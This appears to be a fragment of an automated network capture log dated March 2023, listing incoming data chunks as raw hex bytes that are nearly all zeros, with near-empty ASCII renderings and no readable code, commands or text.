                                                                                                                            2023-03-21 07:00:12 UTC3987INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:12 UTC3987INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b1 07 87 04 00 00 00 00 82 fe bf 36 f9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: `6
                                                                                                                            2023-03-21 07:00:12 UTC4003INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: 0
                                                                                                                            2023-03-21 07:00:12 UTC4019INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: 0
                                                                                                                            2023-03-21 07:00:12 UTC4035INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 d8 83 43 02 00 00 00 00 41 ff 5f 9b 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: CA_|
                                                                                                                            2023-03-21 07:00:12 UTC4051INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:12 UTC4067INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: `
                                                                                                                            2023-03-21 07:00:12 UTC4083INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:12 UTC4099INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 d8 83 43 02 00 00 00 00 41 ff 5f 9b 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: CA_|0
                                                                                                                            2023-03-21 07:00:12 UTC4115INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:12 UTC4131INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:12 UTC4147INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: `
                                                                                                                            2023-03-21 07:00:12 UTC4163INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 d8 83 43 02 00 00 00 00 41 ff 5f 9b 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00
                                                                                                                            Data Ascii: CA_|`
                                                                                                                            2023-03-21 07:00:12 UTC4179INData Raw: 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: 0
                                                                                                                            2023-03-21 07:00:12 UTC4195INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:12 UTC4211INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:12 UTC4211INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:12 UTC4227INData Raw: 41 ff 5f 9b 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: A_|
                                                                                                                            2023-03-21 07:00:12 UTC4243INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b1 07 87 04 00 00 00 00 82 fe bf 36 f9 02 00 00 00
                                                                                                                            Data Ascii: `6
                                                                                                                            2023-03-21 07:00:12 UTC4259INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: 0
                                                                                                                            2023-03-21 07:00:12 UTC4275INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: 0
                                                                                                                            2023-03-21 07:00:12 UTC4291INData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 d8 83 43 02 00 00 00 00 41 ff 5f 9b 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: CA_|
                                                                                                                            2023-03-21 07:00:12 UTC4307INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: `
                                                                                                                            2023-03-21 07:00:12 UTC4323INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: `
                                                                                                                            2023-03-21 07:00:12 UTC4339INData Raw: 00 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: 0
                                                                                                                            2023-03-21 07:00:12 UTC4355INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 d8 83 43 02 00 00 00 00 41 ff 5f 9b 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: CA_|0
                                                                                                                            2023-03-21 07:00:12 UTC4371INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:12 UTC4387INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:13 UTC4387INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
